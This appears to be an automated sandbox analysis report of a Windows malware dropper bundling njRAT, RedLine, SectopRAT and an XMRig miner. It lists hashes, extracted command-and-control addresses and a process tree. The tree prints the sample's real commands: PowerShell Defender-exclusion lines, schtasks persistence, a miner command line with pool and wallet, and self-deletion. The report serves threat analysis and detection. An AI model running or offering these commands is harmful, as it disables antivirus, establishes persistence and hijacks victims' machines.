Analysis
-
max time kernel
149s -
max time network
148s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
08-11-2024 13:38
Static task
static1
Behavioral task
behavioral1
Sample
ff8addf2b89de210fa350138a30eaa67a5772f59dcd0480ffc9d339e7cdd266f.exe
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
ff8addf2b89de210fa350138a30eaa67a5772f59dcd0480ffc9d339e7cdd266f.exe
Resource
win10v2004-20241007-en
General
-
Target
ff8addf2b89de210fa350138a30eaa67a5772f59dcd0480ffc9d339e7cdd266f.exe
-
Size
2.9MB
-
MD5
01fc40917e3e56267e23bbcc3225d6d0
-
SHA1
68a8782da431eddcf7ad88699580a7f034fffbe7
-
SHA256
ff8addf2b89de210fa350138a30eaa67a5772f59dcd0480ffc9d339e7cdd266f
-
SHA512
33d394bc795b96f815d47df8a382d720bfbb8b2d5e9288c868d83ff25712cd32737f1bf868f9ba238e72112b0cc425af538d3bc226267b38213fb364998b344c
-
SSDEEP
49152:cu3XPRmBGiOoYcCeQE7Wq58ctIgktXub5PnyzMezAvKjGM76bfvgAz3:NXPR5JCyq5ptktgdn2RAvKjV767vgAz
Malware Config
Extracted
njrat
im523
HacKed
91.193.4.201:58287
344a7b760874a7de0ff245bf58f8fa0d
-
reg_key
344a7b760874a7de0ff245bf58f8fa0d
-
splitter
|'|'|
Extracted
redline
544363603
91.142.79.35:13400
Signatures
-
Njrat family
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 2 IoCs
resource yara_rule behavioral2/memory/2772-103-0x0000000005250000-0x00000000052A2000-memory.dmp family_redline behavioral2/memory/2772-105-0x00000000058A0000-0x00000000058F0000-memory.dmp family_redline -
Redline family
-
SectopRAT payload 2 IoCs
resource yara_rule behavioral2/memory/2772-103-0x0000000005250000-0x00000000052A2000-memory.dmp family_sectoprat behavioral2/memory/2772-105-0x00000000058A0000-0x00000000058F0000-memory.dmp family_sectoprat -
Sectoprat family
-
Xmrig family
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ BittyHack.exe -
XMRig Miner payload 11 IoCs
resource yara_rule behavioral2/memory/1816-270-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral2/memory/1816-268-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral2/memory/1816-272-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral2/memory/1816-276-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral2/memory/1816-275-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral2/memory/1816-274-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral2/memory/1816-273-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral2/memory/1816-278-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral2/memory/1816-280-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral2/memory/1816-281-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral2/memory/1816-285-0x0000000140000000-0x0000000140786000-memory.dmp xmrig -
Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 1512 powershell.exe 3672 powershell.exe 4144 powershell.exe 2684 powershell.exe 2736 powershell.exe 4320 powershell.exe 432 powershell.exe 1920 powershell.exe -
Modifies Windows Firewall 2 TTPs 1 IoCs
pid Process 4052 netsh.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion BittyHack.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion BittyHack.exe -
Checks computer location settings 2 TTPs 10 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation WindowsHost.exe Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation Explorer.exe Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation Win10.exe Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation WinUpdates.exe Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation WindowsCrashHandler.exe Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation services64.exe Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation services32.exe Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation ff8addf2b89de210fa350138a30eaa67a5772f59dcd0480ffc9d339e7cdd266f.exe Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation svchost32.exe Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation svchost32.exe -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\344a7b760874a7de0ff245bf58f8fa0d.exe sys32.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\344a7b760874a7de0ff245bf58f8fa0d.exe sys32.exe -
Executes dropped EXE 13 IoCs
pid Process 2772 BittyHack.exe 2544 WindowsHost.exe 4140 WinUpdates.exe 4408 Explorer.exe 4416 WindowsCrashHandler.exe 4960 Win10.exe 2332 sys32.exe 4296 svchost32.exe 4280 services64.exe 3768 services32.exe 1308 sihost64.exe 1116 svchost32.exe 2348 sihost32.exe -
resource yara_rule behavioral2/files/0x0008000000023cbb-7.dat themida behavioral2/memory/2772-22-0x0000000000400000-0x0000000000B07000-memory.dmp themida behavioral2/memory/2772-87-0x0000000000400000-0x0000000000B07000-memory.dmp themida behavioral2/memory/2772-88-0x0000000000400000-0x0000000000B07000-memory.dmp themida behavioral2/memory/2772-89-0x0000000000400000-0x0000000000B07000-memory.dmp themida behavioral2/memory/2772-143-0x0000000000400000-0x0000000000B07000-memory.dmp themida behavioral2/memory/2772-230-0x0000000000400000-0x0000000000B07000-memory.dmp themida behavioral2/memory/2772-289-0x0000000000400000-0x0000000000B07000-memory.dmp themida -
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\344a7b760874a7de0ff245bf58f8fa0d = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\sys32.exe\" .." sys32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\344a7b760874a7de0ff245bf58f8fa0d = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\sys32.exe\" .." sys32.exe -
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA BittyHack.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
flow ioc 41 raw.githubusercontent.com 36 raw.githubusercontent.com 37 raw.githubusercontent.com -
Drops autorun.inf file 1 TTPs 5 IoCs
Malware can abuse Windows Autorun to spread further via attached volumes.
description ioc Process File opened for modification C:\autorun.inf sys32.exe File created D:\autorun.inf sys32.exe File created F:\autorun.inf sys32.exe File opened for modification F:\autorun.inf sys32.exe File created C:\autorun.inf sys32.exe -
Drops file in System32 directory 9 IoCs
description ioc Process File created C:\Windows\system32\Microsoft\Libs\sihost64.exe services64.exe File created C:\Windows\system32\Microsoft\Libs\WR64.sys services64.exe File created C:\Windows\system32\Microsoft\Telemetry\sihost32.exe svchost32.exe File created C:\Windows\system32\Microsoft\Telemetry\sihost32.log svchost32.exe File created C:\Windows\system32\services64.exe WinUpdates.exe File opened for modification C:\Windows\system32\services64.exe WinUpdates.exe File created C:\Windows\system32\services32.exe svchost32.exe File opened for modification C:\Windows\system32\services32.exe svchost32.exe File created C:\Windows\system32\Microsoft\Libs\sihost64.log services64.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
pid Process 2772 BittyHack.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 4280 set thread context of 1816 4280 services64.exe 148 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe -
System Location Discovery: System Language Discovery 1 TTPs 7 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sys32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ff8addf2b89de210fa350138a30eaa67a5772f59dcd0480ffc9d339e7cdd266f.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WindowsHost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language BittyHack.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Win10.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4812 schtasks.exe 704 schtasks.exe 708 schtasks.exe 4960 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1512 powershell.exe 1512 powershell.exe 3672 powershell.exe 3672 powershell.exe 4144 powershell.exe 4144 powershell.exe 2684 powershell.exe 2684 powershell.exe 2332 sys32.exe 2332 sys32.exe 2332 sys32.exe 2332 sys32.exe 2332 sys32.exe 2332 sys32.exe 2332 sys32.exe 2332 sys32.exe 2332 sys32.exe 2332 sys32.exe 2332 sys32.exe 2332 sys32.exe 2332 sys32.exe 2332 sys32.exe 2332 sys32.exe 2332 sys32.exe 2332 sys32.exe 2332 sys32.exe 2332 sys32.exe 2332 sys32.exe 2332 sys32.exe 2332 sys32.exe 2332 sys32.exe 2332 sys32.exe 2332 sys32.exe 2332 sys32.exe 2332 sys32.exe 4140 WinUpdates.exe 2332 sys32.exe 2332 sys32.exe 2332 sys32.exe 2332 sys32.exe 2332 sys32.exe 2332 sys32.exe 2332 sys32.exe 2332 sys32.exe 2332 sys32.exe 4296 svchost32.exe 4296 svchost32.exe 2332 sys32.exe 2332 sys32.exe 2332 sys32.exe 2332 sys32.exe 2332 sys32.exe 2332 sys32.exe 2332 sys32.exe 2332 sys32.exe 2332 sys32.exe 2332 sys32.exe 2332 sys32.exe 2332 sys32.exe 2332 sys32.exe 2332 sys32.exe 2332 sys32.exe 2332 sys32.exe 2332 sys32.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 2332 sys32.exe -
Suspicious use of AdjustPrivilegeToken 48 IoCs
description pid Process Token: SeDebugPrivilege 1512 powershell.exe Token: SeDebugPrivilege 3672 powershell.exe Token: SeDebugPrivilege 4144 powershell.exe Token: SeDebugPrivilege 2772 BittyHack.exe Token: SeDebugPrivilege 2684 powershell.exe Token: SeDebugPrivilege 2332 sys32.exe Token: SeDebugPrivilege 4140 WinUpdates.exe Token: SeDebugPrivilege 4296 svchost32.exe Token: SeDebugPrivilege 2736 powershell.exe Token: SeDebugPrivilege 4320 powershell.exe Token: 33 2332 sys32.exe Token: SeIncBasePriorityPrivilege 2332 sys32.exe Token: SeDebugPrivilege 432 powershell.exe Token: SeDebugPrivilege 1920 powershell.exe Token: 33 2332 sys32.exe Token: SeIncBasePriorityPrivilege 2332 sys32.exe Token: SeDebugPrivilege 4280 services64.exe Token: SeDebugPrivilege 1116 svchost32.exe Token: SeLockMemoryPrivilege 1816 svchost.exe Token: SeLockMemoryPrivilege 1816 svchost.exe Token: 33 2332 sys32.exe Token: SeIncBasePriorityPrivilege 2332 sys32.exe Token: 33 2332 sys32.exe Token: SeIncBasePriorityPrivilege 2332 sys32.exe Token: 33 2332 sys32.exe Token: SeIncBasePriorityPrivilege 2332 sys32.exe Token: 33 2332 sys32.exe Token: SeIncBasePriorityPrivilege 2332 sys32.exe Token: 33 2332 sys32.exe Token: SeIncBasePriorityPrivilege 2332 sys32.exe Token: 33 2332 sys32.exe Token: SeIncBasePriorityPrivilege 2332 sys32.exe Token: 33 2332 sys32.exe Token: SeIncBasePriorityPrivilege 2332 sys32.exe Token: 33 2332 sys32.exe Token: SeIncBasePriorityPrivilege 2332 sys32.exe Token: 33 2332 sys32.exe Token: SeIncBasePriorityPrivilege 2332 sys32.exe Token: 33 2332 sys32.exe Token: SeIncBasePriorityPrivilege 2332 sys32.exe Token: 33 2332 sys32.exe Token: SeIncBasePriorityPrivilege 2332 sys32.exe Token: 33 2332 sys32.exe Token: SeIncBasePriorityPrivilege 2332 sys32.exe Token: 33 2332 sys32.exe Token: SeIncBasePriorityPrivilege 2332 sys32.exe Token: 33 2332 sys32.exe Token: SeIncBasePriorityPrivilege 2332 sys32.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2028 wrote to memory of 2772 2028 ff8addf2b89de210fa350138a30eaa67a5772f59dcd0480ffc9d339e7cdd266f.exe 86 PID 2028 wrote to memory of 2772 2028 ff8addf2b89de210fa350138a30eaa67a5772f59dcd0480ffc9d339e7cdd266f.exe 86 PID 2028 wrote to memory of 2772 2028 ff8addf2b89de210fa350138a30eaa67a5772f59dcd0480ffc9d339e7cdd266f.exe 86 PID 2028 wrote to memory of 2544 2028 ff8addf2b89de210fa350138a30eaa67a5772f59dcd0480ffc9d339e7cdd266f.exe 88 PID 2028 wrote to memory of 2544 2028 ff8addf2b89de210fa350138a30eaa67a5772f59dcd0480ffc9d339e7cdd266f.exe 88 PID 2028 wrote to memory of 2544 2028 ff8addf2b89de210fa350138a30eaa67a5772f59dcd0480ffc9d339e7cdd266f.exe 88 PID 2544 wrote to memory of 4140 2544 WindowsHost.exe 89 PID 2544 wrote to memory of 4140 2544 WindowsHost.exe 89 PID 2544 wrote to memory of 4408 2544 WindowsHost.exe 90 PID 2544 wrote to memory of 4408 2544 WindowsHost.exe 90 PID 2544 wrote to memory of 4408 2544 WindowsHost.exe 90 PID 4408 wrote to memory of 4416 4408 Explorer.exe 91 PID 4408 wrote to memory of 4416 4408 Explorer.exe 91 PID 4416 wrote to memory of 2928 4416 WindowsCrashHandler.exe 92 PID 4416 wrote to memory of 2928 4416 WindowsCrashHandler.exe 92 PID 4408 wrote to memory of 4960 4408 Explorer.exe 93 PID 4408 wrote to memory of 4960 4408 Explorer.exe 93 PID 4408 wrote to memory of 4960 4408 Explorer.exe 93 PID 2928 wrote to memory of 1512 2928 cmd.exe 95 PID 2928 wrote to memory of 1512 2928 cmd.exe 95 PID 2928 wrote to memory of 3672 2928 cmd.exe 96 PID 2928 wrote to memory of 3672 2928 cmd.exe 96 PID 2928 wrote to memory of 4144 2928 cmd.exe 97 PID 2928 wrote to memory of 4144 2928 cmd.exe 97 PID 2928 wrote to memory of 2684 2928 cmd.exe 98 PID 2928 wrote to memory of 2684 2928 cmd.exe 98 PID 4960 wrote to memory of 2332 4960 Win10.exe 103 PID 4960 wrote to memory of 2332 4960 Win10.exe 103 PID 4960 wrote to memory of 2332 4960 Win10.exe 103 PID 2332 wrote to memory of 4052 2332 sys32.exe 110 PID 2332 wrote to memory of 4052 2332 sys32.exe 110 PID 2332 wrote to memory of 4052 2332 sys32.exe 110 PID 4140 wrote to memory of 1440 4140 WinUpdates.exe 112 PID 4140 wrote to memory of 1440 4140 WinUpdates.exe 112 PID 1440 wrote to memory of 4812 1440 cmd.exe 114 PID 1440 wrote to memory of 4812 1440 cmd.exe 114 PID 4416 wrote to memory of 4628 4416 WindowsCrashHandler.exe 115 PID 4416 wrote to memory of 4628 4416 WindowsCrashHandler.exe 115 PID 4628 wrote to memory of 4296 4628 cmd.exe 117 PID 4628 wrote to memory of 4296 4628 cmd.exe 117 PID 4296 wrote to memory of 3000 4296 svchost32.exe 118 PID 4296 wrote to memory of 3000 4296 svchost32.exe 118 PID 3000 wrote to memory of 704 3000 cmd.exe 120 PID 3000 wrote to memory of 704 3000 cmd.exe 120 PID 4140 wrote to memory of 4280 4140 WinUpdates.exe 121 PID 4140 wrote to memory of 4280 4140 WinUpdates.exe 121 PID 4296 wrote to memory of 3768 4296 svchost32.exe 122 PID 4296 wrote to memory of 3768 4296 svchost32.exe 122 PID 4296 wrote to memory of 4008 4296 svchost32.exe 123 PID 4296 wrote to memory of 4008 4296 svchost32.exe 123 PID 3768 wrote to memory of 2640 3768 services32.exe 125 PID 3768 wrote to memory of 2640 3768 services32.exe 125 PID 2640 wrote to memory of 2736 2640 cmd.exe 127 PID 2640 wrote to memory of 2736 2640 cmd.exe 127 PID 4008 wrote to memory of 3964 4008 cmd.exe 128 PID 4008 wrote to memory of 3964 4008 cmd.exe 128 PID 2640 wrote to memory of 4320 2640 cmd.exe 129 PID 2640 wrote to memory of 4320 2640 cmd.exe 129 PID 2640 wrote to memory of 432 2640 cmd.exe 130 PID 2640 wrote to memory of 432 2640 cmd.exe 130 PID 2640 wrote to memory of 1920 2640 cmd.exe 131 PID 2640 wrote to memory of 1920 2640 cmd.exe 131 PID 4280 wrote to memory of 2964 4280 services64.exe 135 PID 4280 wrote to memory of 2964 4280 services64.exe 135 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\ff8addf2b89de210fa350138a30eaa67a5772f59dcd0480ffc9d339e7cdd266f.exe"C:\Users\Admin\AppData\Local\Temp\ff8addf2b89de210fa350138a30eaa67a5772f59dcd0480ffc9d339e7cdd266f.exe"1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2028 -
C:\Users\Admin\AppData\Roaming\BittyHack.exe"C:\Users\Admin\AppData\Roaming\BittyHack.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:2772
-
-
C:\Users\Admin\AppData\Roaming\WindowsHost.exe"C:\Users\Admin\AppData\Roaming\WindowsHost.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2544 -
C:\Users\Admin\AppData\Roaming\WinUpdates.exe"C:\Users\Admin\AppData\Roaming\WinUpdates.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4140 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"' & exit4⤵
- Suspicious use of WriteProcessMemory
PID:1440 -
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"'5⤵
- Scheduled Task/Job: Scheduled Task
PID:4812
-
-
-
C:\Windows\system32\services64.exe"C:\Windows\system32\services64.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4280 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"' & exit5⤵PID:2964
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"'6⤵
- Scheduled Task/Job: Scheduled Task
PID:708
-
-
-
C:\Windows\system32\Microsoft\Libs\sihost64.exe"C:\Windows\system32\Microsoft\Libs\sihost64.exe"5⤵
- Executes dropped EXE
PID:1308
-
-
C:\Windows\System32\svchost.exeC:\Windows/System32\svchost.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=467cijEdKaagF8BDuU34TjMYk82LvhFozMctKetFMtaU8TYBejNKLbbMb3PbANBpZ97XjkJjzQJbyX9BdU5CmPRX3CUC8dU --pass=123 --cpu-max-threads-hint=60 --cinit-remote-config="tHg/Fec4JaWoq3ZRb8ABB9AEzMGpzWZtTQtnnclZnhc=" --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56GQTOYuXRCBeyb5NYlmdCuiwuvmEFRE3FUoytGa2xDRKVyTGVqBRZ3YvrseaWnYy0OhLuczKVxfo8Wo33kvDh26CIpmy6+bf50YCXxhpkDvay12RqWFwTrEWzJDjMOFSbV4qSudJZDKeejGmt2wAsK4zZ9lj0F0NMeagNs9oiluuddfhHuwfN3JDOsm7vnmpSFDvtwzZIXsZWyWN624JxJsSIqBQxfKrcCnHvRx/k2yLSlvxLvum+3cwztr7Zb0wO7EEWrafJMkNolCTGr1RQK9klv+u1q+LOMUOW+Y1mA+ZjeC+aSi9qmt59ZMlAX42foDzL1w8qyVjl6rfhEF/2bTP0YCyKockkTlSVngGY/1F1T5EOo9DhmrxyNy9y8mJqRKYUIcpgNI5Y4F/BBh3W0pw0+6w6pKB/o2s/ADQ0m7f1mIWwiXrj/GHg6M2kw4tg4mnBGVnha642JDqV8iaYphm4FpsNVwyEeLSXd18Mjr+kd9fvE08ohpB15bbg+6JPSeWISk8CHiep3TzEvyvZ+5XcHZVh1iXXZwlYO+wW5wxnobnzBzuj6f/BZ2txWK+7m4Cgd8mjMym7jJ/vKH1WIDSz05jpx4+wkdqzn3YIdvl2S8Luc4rG0CJXqJOdwbYOBrAey4VzJk8E8cY9tmMr5hpjLcfmu59CVDYVbbFFkb9zLoOp89XSPAN5hEW0HK5dw==" --cinit-idle-wait=1 --cinit-idle-cpu=80 --tls --cinit-stealth5⤵
- Suspicious use of AdjustPrivilegeToken
PID:1816
-
-
-
-
C:\Users\Admin\AppData\Roaming\Explorer.exe"C:\Users\Admin\AppData\Roaming\Explorer.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4408 -
C:\Users\Admin\AppData\Roaming\WindowsCrashHandler.exe"C:\Users\Admin\AppData\Roaming\WindowsCrashHandler.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4416 -
C:\Windows\SYSTEM32\cmd.exe"cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit5⤵
- Suspicious use of WriteProcessMemory
PID:2928 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1512
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3672
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4144
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2684
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\svchost32.exe "C:\Users\Admin\AppData\Roaming\WindowsCrashHandler.exe"5⤵
- Suspicious use of WriteProcessMemory
PID:4628 -
C:\Users\Admin\AppData\Local\Temp\svchost32.exeC:\Users\Admin\AppData\Local\Temp\svchost32.exe "C:\Users\Admin\AppData\Roaming\WindowsCrashHandler.exe"6⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4296 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Windows\system32\services32.exe"' & exit7⤵
- Suspicious use of WriteProcessMemory
PID:3000 -
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Windows\system32\services32.exe"'8⤵
- Scheduled Task/Job: Scheduled Task
PID:704
-
-
-
C:\Windows\system32\services32.exe"C:\Windows\system32\services32.exe"7⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3768 -
C:\Windows\system32\cmd.exe"cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit8⤵
- Suspicious use of WriteProcessMemory
PID:2640 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'9⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:2736
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'9⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:4320
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'9⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:432
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'9⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:1920
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\svchost32.exe "C:\Windows\system32\services32.exe"8⤵PID:2632
-
C:\Users\Admin\AppData\Local\Temp\svchost32.exeC:\Users\Admin\AppData\Local\Temp\svchost32.exe "C:\Windows\system32\services32.exe"9⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
PID:1116 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Windows\system32\services32.exe"' & exit10⤵PID:4336
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Windows\system32\services32.exe"'11⤵
- Scheduled Task/Job: Scheduled Task
PID:4960
-
-
-
C:\Windows\system32\Microsoft\Telemetry\sihost32.exe"C:\Windows\system32\Microsoft\Telemetry\sihost32.exe"10⤵
- Executes dropped EXE
PID:2348
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\svchost32.exe"10⤵PID:1664
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 311⤵PID:2852
-
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\svchost32.exe"7⤵
- Suspicious use of WriteProcessMemory
PID:4008 -
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 38⤵PID:3964
-
-
-
-
-
-
